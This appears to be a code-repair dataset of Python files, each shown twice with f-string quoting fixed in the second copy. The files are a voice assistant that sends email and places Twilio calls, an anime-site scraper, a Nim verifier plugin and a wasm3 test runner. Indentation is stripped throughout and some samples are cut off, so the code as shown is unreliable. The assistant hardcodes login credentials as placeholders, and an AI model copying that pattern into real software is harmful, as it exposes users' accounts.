codePath = "C:\\Users\\Aritra Roy\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'quit' in query or 'exit' in query or 'close' in query:
speak("Thanks for using Era!!!")
exit()
elif 'awesome' in query or 'wow' in query or 'amazing' in query or 'wonderful' in query:
speak("Thank you sir, I'm always here for you")
elif 'what' in query or 'who' in query or 'where' in query or 'can you' in query:
webbrowser.open(f"https://www.google.com/search?&q={query}")
speak(wikipedia.summary(query, sentences=2))
elif 'email to' in query or 'send a mail' in query or 'mail to' in query:
# This will send mail only if there is any matching name in last of query
# the last word should be in all strings contain a name which is exist as key in nameList
zippedNameEmailList = fetchNameEmail()
name1List, emailList = zip(*zippedNameEmailList)
name1FinalList = name1Lower(name1List)
queryList = queryLowerSplit(query)
i = 0
for item in name1FinalList:
i += 1
for item1 in item:
for item2 in queryList:
if item2 == item1:
try:
speak("What is your message ?")
content = takeCommand()
to = emailList[i - 1]
sendEmail(to, content)
speak("Email has been sent")
break
except Exception as e:
print(e)
speak("Sorry sir, something went wrong and i am not able to send your email right now.")
break
else:
continue
break
else:
continue
break
if i + 1 > len(name1FinalList):
speak("Contact not found")
elif 'phone' in query or 'make call' in query or 'call' in query:
zippednamePhoneNoList = fetchNamePhoneNo()
name2List, phoneNoList = zip(*zippednamePhoneNoList)
name2FinalList = name2Lower(name2List)
queryList = queryLowerSplit(query)
i = 0
for item in name2FinalList:
i += 1
for item1 in item:
for item2 in queryList:
if item2 == item1:
try:
# Your Account Sid and Auth Token from twilio.com/console
# DANGER! This is insecure. See http://twil.io/secure
account_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth_token = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
client = Client(account_sid, auth_token)
call = client.calls.create(
twiml='<Response><Say>Ahoy, World!</Say></Response>',
to=phoneNoList[i - 1],
from_='+1XXXXXXXXXX'
)
speak("Calling has been initiated")
break
except Exception as e:
print(e)
speak("Sorry sir, something went wrong and i am not able to call right now.")
break
else:
continue
break
else:
continue
break
if i + 1 > len(name2FinalList):
speak("Contact not found")
elif 'headlines' in query or 'news' in query or 'headline' in query:
givenews()
| from __future__ import print_function
import pyttsx3
import datetime
import smtplib
import speech_recognition as sr
import wikipedia
import webbrowser
import os
import random
from twilio.rest import Client
import pickle
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import requests
import json
from decouple import config
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/contacts.readonly']
def speak(audio):
# It speaks a given string
engine.say(audio)
engine.runAndWait()
def wishMe():
# Wish according to the time.
hour = int(datetime.datetime.now().hour)
if 0 <= hour < 12:
speak("Good Morning!")
elif 12 <= hour < 18:
speak("Good Afternoon!")
elif 18 <= hour < 23:
speak("Good Evening!")
else:
speak(
"Good Night, sir...It's good for health to have dinner and go to bed now...as you know Early to bed and "
"early to rise, makes a man healthy, wealthy and wise.")
speak("Thanks for using Era")
exit()
speak("I'm Era, your personal voice assistant. Please tell how may I help you?")
def sendEmail(to, content):
# It sends an email
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('your_email@gmail.com',
'your_password') # Enter your password
server.sendmail('your_email@gmail.com', to, content)
server.close()
def fetchSecret():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
return build('people', 'v1', credentials=creds)
def fetchNameEmail():
"""Fetches name and their email ids from google contacts"""
# Calls our function to retrieve our secret
service = fetchSecret()
# Call the People API
results = service.people().connections().list(
resourceName='people/me',
pageSize=1500,
personFields='names,emailAddresses').execute()
connections = results.get('connections', [])
name1List = []
emailList = []
for person in connections:
names = person.get('names', [])
emails = person.get('emailAddresses', [])
if names and emails:
name = names[0].get('displayName')
name1List.append(name)
email = emails[0]['value']
emailList.append(email)
nameEmailList = zip(name1List, emailList)
return sorted(nameEmailList, key=lambda x: x[0])
def name1Lower(name1List):
"""Makes all the names lowercase for name-email id list"""
name1ListLower = list(map(lambda x: x.lower(), name1List))
return list(map(lambda x: x.split(), name1ListLower))
def fetchNamePhoneNo():
"""Fetches name and their phone numbers from google contacts"""
# Calls our function to retrieve our secret
service = fetchSecret()
# Call the People API
results = service.people().connections().list(
resourceName='people/me',
pageSize=1500,
personFields='names,emailAddresses,phoneNumbers').execute()
connections = results.get('connections', [])
name2List = []
phoneNoList = []
for person in connections:
names = person.get('names', [])
phones = person.get('phoneNumbers', [])
if phones:
name = names[0].get('displayName')
name2List.append(name)
phone = phones[0]['value']
phoneNoList.append(phone)
namePhoneNoList = zip(name2List, phoneNoList)
return sorted(namePhoneNoList, key=lambda x: x[0])
def name2Lower(name2List):
"""Makes all the names lowercase for name-phone number list"""
name2ListLower = list(map(lambda x: x.lower(), name2List))
return list(map(lambda x: x.split(), name2ListLower))
def queryLowerSplit(query):
"""Makes all the query elements lowercase"""
queryLower = query.lower()
return queryLower.split()
def takeCommand():
# It takes microphone input from user and returns string output
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.adjust_for_ambient_noise(source)
r.pause_threshold = 1
audio = r.listen(source,
phrase_time_limit=4) # it converts the audio input into string and gives a span of 4 sec to an user to speak
try:
print("Recognizing...")
query = r.recognize_google(audio, language='en-in')
# query = r.recognize_sphinx(audio) #instead of that we can use this is offline but accuray very poor
print(f"User said: {query}")
except:
print("Say that again please...")
return "None"
return query
# Commenting out function since its not being used.
# def splitWords(query):
# return lst[0].split()
def givenews():
news_api = config('News_API')
speak("News for today..Lets begin")
url = f"http://newsapi.org/v2/top-headlines?country=in&apiKey={news_api}"
news = requests.get(url).text
news_dict = json.loads(news)
arts = news_dict['articles']
i = 1
for article in arts[:-1]:
speak(article['title'])
print(f"\n{i}. {article['title']}")
speak("Moving on to the next news....")
i += 1
for article in arts[-1:]:
speak(article['title'])
print(f"\n{i}. {article['title']}")
speak("Thanks for listening...")
speak("Stay tuned for more updated news")
if __name__ == '__main__':
wishMe()
while True:
# if 1:
query = takeCommand().lower()
# Logic for executing tasks based on query
if "how are you" in query:
speak("I'm fine sir, what about you?")
elif "fine" in query:
speak("It's good to know that you are fine.")
elif "who are you" in query:
speak("My name is Era. I'm a desktop assistant made by Mr Aritra.")
elif 'wikipedia' in query:
# sentences=2 means return first two string
results = wikipedia.summary(query, sentences=2)
speak("According to wikipedia..")
# print("According to wikipedia")
# print(results)
speak(results)
elif 'open spartan' in query or 'spartan' in query:
spartanPath = "C:\\Program Files\\Wavefunction\\Spartan14v114\\WF14gui64.exe"
os.startfile(spartanPath)
elif 'open youtube' in query:
webbrowser.open('http://www.youtube.com')
elif 'open google' in query:
webbrowser.open('https://www.google.co.in/')
elif 'open stackoverflow' in query:
webbrowser.open('https://stackoverflow.com/')
elif 'play music' in query or 'play song' in query or 'play some music' in query or 'play another music' in query or 'change song' in query or 'next song' in query:
music_dir = 'G:\\RabindraSangeet'
songs = os.listdir(music_dir)
os.startfile(os.path.join(
music_dir, songs[random.randint(0, len(songs) - 1)]))
elif 'the time' in query or 'time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"Sir, the time is {strTime}")
elif 'open code' in query or 'open visual studio' in query:
codePath = "C:\\Users\\Aritra Roy\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'quit' in query or 'exit' in query or 'close' in query:
speak("Thanks for using Era!!!")
exit()
elif 'awesome' in query or 'wow' in query or 'amazing' in query or 'wonderful' in query:
speak("Thank you sir, I'm always here for you")
elif 'what' in query or 'who' in query or 'where' in query or 'can you' in query:
webbrowser.open(f"https://www.google.com/search?&q={query}")
speak(wikipedia.summary(query, sentences=2))
elif 'email to' in query or 'send a mail' in query or 'mail to' in query:
# This will send mail only if there is any matching name in last of query
# the last word should be in all strings contain a name which is exist as key in nameList
zippedNameEmailList = fetchNameEmail()
name1List, emailList = zip(*zippedNameEmailList)
name1FinalList = name1Lower(name1List)
queryList = queryLowerSplit(query)
i = 0
for item in name1FinalList:
i += 1
for item1 in item:
for item2 in queryList:
if item2 == item1:
try:
speak("What is your message ?")
content = takeCommand()
to = emailList[i - 1]
sendEmail(to, content)
speak("Email has been sent")
break
except Exception as e:
print(e)
speak("Sorry sir, something went wrong and i am not able to send your email right now.")
break
else:
continue
break
else:
continue
break
if i + 1 > len(name1FinalList):
speak("Contact not found")
elif 'phone' in query or 'make call' in query or 'call' in query:
zippednamePhoneNoList = fetchNamePhoneNo()
name2List, phoneNoList = zip(*zippednamePhoneNoList)
name2FinalList = name2Lower(name2List)
queryList = queryLowerSplit(query)
i = 0
for item in name2FinalList:
i += 1
for item1 in item:
for item2 in queryList:
if item2 == item1:
try:
# Your Account Sid and Auth Token from twilio.com/console
# DANGER! This is insecure. See http://twil.io/secure
account_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth_token = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
client = Client(account_sid, auth_token)
call = client.calls.create(
twiml='<Response><Say>Ahoy, World!</Say></Response>',
to=phoneNoList[i - 1],
from_='+1XXXXXXXXXX'
)
speak("Calling has been initiated")
break
except Exception as e:
print(e)
speak("Sorry sir, something went wrong and i am not able to call right now.")
break
else:
continue
break
else:
continue
break
if i + 1 > len(name2FinalList):
speak("Contact not found")
elif 'headlines' in query or 'news' in query or 'headline' in query:
givenews()
|
import re
from typing import List
import requests
from anime_cli.anime import Anime
from anime_cli.search import SearchApi
class GogoAnime(SearchApi):
def __init__(self, mirror: str):
super().__init__(mirror)
self.url = f"https://gogoanime.{mirror}"
@staticmethod
def get_headers() -> dict[str, str]:
return {"Referer": "https://gogoplay1.com/"}
def search_anime(self, keyword: str) -> List[Anime]:
# Get and parse the html from the site
soup = self.get_soup(f"search.html?keyword={keyword}")
# Find all the p tags which have the name class
animes = soup.findAll("p", {"class": "name"})
return [
Anime(anime.a["title"], anime.a["href"].split("/")[2]) for anime in animes
]
def get_episodes_count(self, anime: Anime) -> int:
soup = self.get_soup(f"category/{anime.id}")
# Find all the ul tag which have an id of episode_page
episode_page = soup.find("ul", {"id": "episode_page"})
# From the ul tag find all the elements having li tag and then get ep_end
# from the last li tag which is the total number of episodes
episode_count = int(episode_page.find_all("li")[-1].a["ep_end"])
return episode_count
def get_embed_video(self, anime: Anime, episode: int) -> str:
soup = self.get_soup(f"{anime.id}-episode-{episode}")
# In the html search for a `a` tag
# having the rel: 100 and href: # properties
link = soup.find("a", {"href": "#", "rel": "100"})
return f'https:{link['data-video']}'
def get_video_url(self, embed_url: str) -> str:
"""
Get video url returns the direct link to video by parsing
the page where the video is embedded
"""
# Get the page where the video is embedded
r = requests.get(embed_url, headers=self.request_headers)
# Search for the link to the video and return it
link = re.search(r"\s*sources.*", r.text).group()
link = re.search(r"https:.*(m3u8)|(mp4)", link).group()
return link
| import re
from typing import List
import requests
from anime_cli.anime import Anime
from anime_cli.search import SearchApi
class GogoAnime(SearchApi):
def __init__(self, mirror: str):
super().__init__(mirror)
self.url = f"https://gogoanime.{mirror}"
@staticmethod
def get_headers() -> dict[str, str]:
return {"Referer": "https://gogoplay1.com/"}
def search_anime(self, keyword: str) -> List[Anime]:
# Get and parse the html from the site
soup = self.get_soup(f"search.html?keyword={keyword}")
# Find all the p tags which have the name class
animes = soup.findAll("p", {"class": "name"})
return [
Anime(anime.a["title"], anime.a["href"].split("/")[2]) for anime in animes
]
def get_episodes_count(self, anime: Anime) -> int:
soup = self.get_soup(f"category/{anime.id}")
# Find all the ul tag which have an id of episode_page
episode_page = soup.find("ul", {"id": "episode_page"})
# From the ul tag find all the elements having li tag and then get ep_end
# from the last li tag which is the total number of episodes
episode_count = int(episode_page.find_all("li")[-1].a["ep_end"])
return episode_count
def get_embed_video(self, anime: Anime, episode: int) -> str:
soup = self.get_soup(f"{anime.id}-episode-{episode}")
# In the html search for a `a` tag
# having the rel: 100 and href: # properties
link = soup.find("a", {"href": "#", "rel": "100"})
return f'https:{link["data-video"]}'
def get_video_url(self, embed_url: str) -> str:
"""
Get video url returns the direct link to video by parsing
the page where the video is embedded
"""
# Get the page where the video is embedded
r = requests.get(embed_url, headers=self.request_headers)
# Search for the link to the video and return it
link = re.search(r"\s*sources.*", r.text).group()
link = re.search(r"https:.*(m3u8)|(mp4)", link).group()
return link
|
# Python Version: 3.x
import functools
import pathlib
import subprocess
from logging import getLogger
from typing import *
from onlinejudge_verify.config import get_config
from onlinejudge_verify.languages.models import Language, LanguageEnvironment
logger = getLogger(__name__)
class NimLanguageEnvironment(LanguageEnvironment):
compile_to: str
NIMFLAGS: List[str]
def __init__(self, *, compile_to: str, NIMFLAGS: List[str]):
self.compile_to = compile_to
self.NIMFLAGS = NIMFLAGS
def compile(self, path: pathlib.Path, *, basedir: pathlib.Path, tempdir: pathlib.Path) -> None:
command = ["nim", self.compile_to, "-p:.", f"-o:{str(tempdir /"a.out")}", f"--nimcache:{str(tempdir)}"] + self.NIMFLAGS + [str(path)]
logger.info('$ %s', ' '.join(command))
subprocess.check_call(command)
def get_execute_command(self, path: pathlib.Path, *, basedir: pathlib.Path, tempdir: pathlib.Path) -> List[str]:
return [str(tempdir / "a.out")]
@functools.lru_cache(maxsize=None)
def _list_direct_dependencies(path: pathlib.Path, *, basedir: pathlib.Path) -> List[pathlib.Path]:
items: List[str] = []
with open(basedir / path, 'rb') as fh:
for line in fh.read().decode().splitlines():
line = line.strip()
if line.startswith('include'):
items += line[7:].strip().split(',')
elif line.startswith('import'):
line = line[6:]
i = line.find(' except ')
if i >= 0:
line = line[:i]
items += line.split(',')
elif line.startswith('from'):
i = line.find(' import ')
if i >= 0:
items += line[4:i - 1]
dependencies = [path.resolve()]
for item in items:
item = item.strip()
if item.startswith("\""):
item = item[1:len(item) - 1]
else:
item += ".nim"
item_ = pathlib.Path(item)
if item_.exists():
dependencies.append(item_)
return list(set(dependencies))
class NimLanguage(Language):
config: Dict[str, Any]
def __init__(self, *, config: Optional[Dict[str, Any]] = None):
if config is None:
self.config = get_config().get('languages', {}).get('nim', {})
else:
self.config = config
def list_dependencies(self, path: pathlib.Path, *, basedir: pathlib.Path) -> List[pathlib.Path]:
dependencies = []
visited: Set[pathlib.Path] = set()
stk = [path.resolve()]
while stk:
path = stk.pop()
if path in visited:
continue
visited.add(path)
for child in _list_direct_dependencies(path, basedir=basedir):
dependencies.append(child)
stk.append(child)
return list(set(dependencies))
def bundle(self, path: pathlib.Path, *, basedir: pathlib.Path) -> bytes:
raise NotImplementedError
def is_verification_file(self, path: pathlib.Path, *, basedir: pathlib.Path) -> bool:
return path.name.endswith("_test.nim")
def list_environments(self, path: pathlib.Path, *, basedir: pathlib.Path) -> List[NimLanguageEnvironment]:
default_compile_to = 'cpp'
default_NIMFLAGS = ['-d:release', '--opt:speed']
envs = []
if 'environments' not in self.config:
envs.append(NimLanguageEnvironment(compile_to=default_compile_to, NIMFLAGS=default_NIMFLAGS))
else:
for env in self.config['environments']:
compile_to = env.get('compile_to', default_compile_to)
NIMFLAGS: List[str] = env.get('NIMFLAGS', default_NIMFLAGS)
if not isinstance(NIMFLAGS, list):
raise RuntimeError('NIMFLAGS must ba a list')
envs.append(NimLanguageEnvironment(compile_to=compile_to, NIMFLAGS=NIMFLAGS))
return envs
| # Python Version: 3.x
import functools
import pathlib
import subprocess
from logging import getLogger
from typing import *
from onlinejudge_verify.config import get_config
from onlinejudge_verify.languages.models import Language, LanguageEnvironment
logger = getLogger(__name__)
class NimLanguageEnvironment(LanguageEnvironment):
compile_to: str
NIMFLAGS: List[str]
def __init__(self, *, compile_to: str, NIMFLAGS: List[str]):
self.compile_to = compile_to
self.NIMFLAGS = NIMFLAGS
def compile(self, path: pathlib.Path, *, basedir: pathlib.Path, tempdir: pathlib.Path) -> None:
command = ["nim", self.compile_to, "-p:.", f"-o:{str(tempdir /'a.out')}", f"--nimcache:{str(tempdir)}"] + self.NIMFLAGS + [str(path)]
logger.info('$ %s', ' '.join(command))
subprocess.check_call(command)
def get_execute_command(self, path: pathlib.Path, *, basedir: pathlib.Path, tempdir: pathlib.Path) -> List[str]:
return [str(tempdir / "a.out")]
@functools.lru_cache(maxsize=None)
def _list_direct_dependencies(path: pathlib.Path, *, basedir: pathlib.Path) -> List[pathlib.Path]:
items: List[str] = []
with open(basedir / path, 'rb') as fh:
for line in fh.read().decode().splitlines():
line = line.strip()
if line.startswith('include'):
items += line[7:].strip().split(',')
elif line.startswith('import'):
line = line[6:]
i = line.find(' except ')
if i >= 0:
line = line[:i]
items += line.split(',')
elif line.startswith('from'):
i = line.find(' import ')
if i >= 0:
items += line[4:i - 1]
dependencies = [path.resolve()]
for item in items:
item = item.strip()
if item.startswith("\""):
item = item[1:len(item) - 1]
else:
item += ".nim"
item_ = pathlib.Path(item)
if item_.exists():
dependencies.append(item_)
return list(set(dependencies))
class NimLanguage(Language):
config: Dict[str, Any]
def __init__(self, *, config: Optional[Dict[str, Any]] = None):
if config is None:
self.config = get_config().get('languages', {}).get('nim', {})
else:
self.config = config
def list_dependencies(self, path: pathlib.Path, *, basedir: pathlib.Path) -> List[pathlib.Path]:
dependencies = []
visited: Set[pathlib.Path] = set()
stk = [path.resolve()]
while stk:
path = stk.pop()
if path in visited:
continue
visited.add(path)
for child in _list_direct_dependencies(path, basedir=basedir):
dependencies.append(child)
stk.append(child)
return list(set(dependencies))
def bundle(self, path: pathlib.Path, *, basedir: pathlib.Path) -> bytes:
raise NotImplementedError
def is_verification_file(self, path: pathlib.Path, *, basedir: pathlib.Path) -> bool:
return path.name.endswith("_test.nim")
def list_environments(self, path: pathlib.Path, *, basedir: pathlib.Path) -> List[NimLanguageEnvironment]:
default_compile_to = 'cpp'
default_NIMFLAGS = ['-d:release', '--opt:speed']
envs = []
if 'environments' not in self.config:
envs.append(NimLanguageEnvironment(compile_to=default_compile_to, NIMFLAGS=default_NIMFLAGS))
else:
for env in self.config['environments']:
compile_to = env.get('compile_to', default_compile_to)
NIMFLAGS: List[str] = env.get('NIMFLAGS', default_NIMFLAGS)
if not isinstance(NIMFLAGS, list):
raise RuntimeError('NIMFLAGS must ba a list')
envs.append(NimLanguageEnvironment(compile_to=compile_to, NIMFLAGS=NIMFLAGS))
return envs
|
#!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-wasi-test.py
# ./run-wasi-test.py --exec ../custom_build/wasm3 --timeout 120
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:." --separate-args
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:. wasm3.wasm --" --fast
import argparse
import sys
import subprocess
import hashlib
import fnmatch
sys.path.append('../extra')
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3")
parser.add_argument("--separate-args", action='store_true') # use "--" separator for wasmer, wasmtime
parser.add_argument("--timeout", type=int, default=120)
parser.add_argument("--fast", action='store_true')
args = parser.parse_args()
stats = dotdict(total_run=0, failed=0, crashed=0, timeout=0)
commands_full = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "/wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; /wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "Simple WASI test (wasm-opt -O3)",
"wasm": "./wasi/simple/test-opt.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["128", "4e5"],
"expect_sha1": "37091e7ce96adeea88f079ad95d239a651308a56"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["128", "4e5"],
"expect_sha1": "b3f904daf1c972b4f7d3f8996743cb5b5146b877"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "128x128"],
"expect_sha1": "90f86845ae227466a06ea8db06e753af4838f2fa"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["16", "64"],
"expect_sha1": "d85df3561eb15f6f0e6f20d5640e8e1306222c6d"
}, {
"skip": True, # Fails on Windows on CI only, CNR
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "STREAM",
"wasm": "./wasi/stream/stream.wasm",
"expect_pattern": "----*Solution Validates:*on all three arrays*----*"
}, {
# TODO "if": { "file_exists": "./self-hosting/wasm3-fib.wasm" },
"name": "Self-hosting",
"wasm": "./self-hosting/wasm3-fib.wasm",
"expect_pattern": "wasm3 on WASM*Result: 832040*Elapsed: * ms*"
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "8eacda4b80fc816cad185330caa7556e19643dff"
}, {
"name": "CoreMark",
"wasm": "./wasi/coremark/coremark.wasm",
"expect_pattern": "*Correct operation validated.*CoreMark 1.0 : * / Clang* / STATIC*"
}
]
commands_fast = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"skip": True, # Backtraces not enabled by default
"name": "Simple WASI test",
"wasm": "./wasi/test.wasm",
"args": ["trap"],
"can_crash": True,
"expect_pattern": "Hello world*Constructor OK*Args: *; trap;* wasm backtrace:* 6: 0x*Error:* unreachable executed*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["32", "4e5"],
"expect_sha1": "1fdb7dea7ec0f2465054cc623dc5a7225a876361"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["32", "4e5"],
"expect_sha1": "b6d3c158a5c0dff1f6e82a3556c071e4f8b9e3f0"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "32x32"],
"expect_sha1": "05af9604bf352234276e4d64e84b8d666574316c"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["4", "32"],
"expect_sha1": "ea05d85998b2f453b588ef76a1256215bf9b851c"
}, {
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29_small.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "0e8af02a7207c0c617d7d38eed92853c4a619987"
}
]
def fail(msg):
print(f"{ansi.FAIL}FAIL:{ansi.ENDC} {msg}")
stats.failed += 1
commands = commands_fast if args.fast else commands_full
for cmd in commands:
if "skip" in cmd:
continue
command = args.exec.split(' ')
command.append(cmd['wasm'])
if "args" in cmd:
if args.separate_args:
command.append("--")
command.extend(cmd['args'])
command = list(map(str, command))
print(f"=== {cmd["name"]} ===")
stats.total_run += 1
try:
if "stdin" in cmd:
fn = cmd['stdin']
f = open(fn, "rb")
print(f"cat {fn} | {" ".join(command)}")
output = subprocess.check_output(command, timeout=args.timeout, stdin=f)
elif "can_crash" in cmd:
print(f"{" ".join(command)}")
output = subprocess.run(command, timeout=args.timeout, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
else:
print(f"{" ".join(command)}")
output = subprocess.check_output(command, timeout=args.timeout)
except subprocess.TimeoutExpired:
stats.timeout += 1
fail("Timeout")
continue
except subprocess.CalledProcessError:
stats.crashed += 1
fail("Crashed")
continue
if "expect_sha1" in cmd:
actual = hashlib.sha1(output).hexdigest()
if actual != cmd['expect_sha1']:
fail(f"Actual sha1: {actual}")
if "expect_pattern" in cmd:
actual = output.decode("utf-8")
if not fnmatch.fnmatch(actual, cmd['expect_pattern']):
fail(f"Output does not match pattern:\n{actual}")
print()
pprint(stats)
if stats.failed:
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {stats.failed}/{stats.total_run}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
else:
print(f"{ansi.OKGREEN}=======================")
print(f" All {stats.total_run} tests OK")
print(f"======================={ansi.ENDC}")
| #!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-wasi-test.py
# ./run-wasi-test.py --exec ../custom_build/wasm3 --timeout 120
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:." --separate-args
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:. wasm3.wasm --" --fast
import argparse
import sys
import subprocess
import hashlib
import fnmatch
sys.path.append('../extra')
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3")
parser.add_argument("--separate-args", action='store_true') # use "--" separator for wasmer, wasmtime
parser.add_argument("--timeout", type=int, default=120)
parser.add_argument("--fast", action='store_true')
args = parser.parse_args()
stats = dotdict(total_run=0, failed=0, crashed=0, timeout=0)
commands_full = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "/wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; /wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "Simple WASI test (wasm-opt -O3)",
"wasm": "./wasi/simple/test-opt.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["128", "4e5"],
"expect_sha1": "37091e7ce96adeea88f079ad95d239a651308a56"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["128", "4e5"],
"expect_sha1": "b3f904daf1c972b4f7d3f8996743cb5b5146b877"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "128x128"],
"expect_sha1": "90f86845ae227466a06ea8db06e753af4838f2fa"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["16", "64"],
"expect_sha1": "d85df3561eb15f6f0e6f20d5640e8e1306222c6d"
}, {
"skip": True, # Fails on Windows on CI only, CNR
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "STREAM",
"wasm": "./wasi/stream/stream.wasm",
"expect_pattern": "----*Solution Validates:*on all three arrays*----*"
}, {
# TODO "if": { "file_exists": "./self-hosting/wasm3-fib.wasm" },
"name": "Self-hosting",
"wasm": "./self-hosting/wasm3-fib.wasm",
"expect_pattern": "wasm3 on WASM*Result: 832040*Elapsed: * ms*"
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "8eacda4b80fc816cad185330caa7556e19643dff"
}, {
"name": "CoreMark",
"wasm": "./wasi/coremark/coremark.wasm",
"expect_pattern": "*Correct operation validated.*CoreMark 1.0 : * / Clang* / STATIC*"
}
]
commands_fast = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"skip": True, # Backtraces not enabled by default
"name": "Simple WASI test",
"wasm": "./wasi/test.wasm",
"args": ["trap"],
"can_crash": True,
"expect_pattern": "Hello world*Constructor OK*Args: *; trap;* wasm backtrace:* 6: 0x*Error:* unreachable executed*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["32", "4e5"],
"expect_sha1": "1fdb7dea7ec0f2465054cc623dc5a7225a876361"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["32", "4e5"],
"expect_sha1": "b6d3c158a5c0dff1f6e82a3556c071e4f8b9e3f0"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "32x32"],
